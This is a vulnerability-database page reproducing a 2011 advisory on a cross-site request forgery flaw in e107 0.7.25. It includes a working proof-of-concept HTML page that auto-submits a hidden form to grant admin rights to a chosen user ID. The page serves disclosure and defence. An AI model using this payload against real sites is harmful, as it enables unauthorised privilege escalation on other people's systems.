Lucene search
+L

e107 0.7.25 Cross Site Request Forgery

🗓️ 07 Apr 2011 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

e107 0.7.25 Cross Site Request Forgery vulnerability allows admin privilege gran

Code
`<!------------------------------------------------------------------------  
# Software................e107 0.7.25  
# Vulnerability...........Cross-site Request Forgery  
# Threat Level............Low (1/5)  
# Download................http://e107.org/edownload.php  
# Discovery Date..........4/5/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# Email...................John Leitch <[email protected]>  
# ------------------------------------------------------------------------  
#   
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in e107 can be exploited to  
# grant admin privileges.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/e107/e107_admin/users.php">  
<input type="hidden" name="e-token" value="" />  
<input type="hidden" name="userid" value="2" />  
<input type="hidden" name="userip" value="" />  
<input type="hidden" name="useraction" value="admin" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Apr 2011 00:00Current
0.5Low risk
Vulners AI Score0.5
21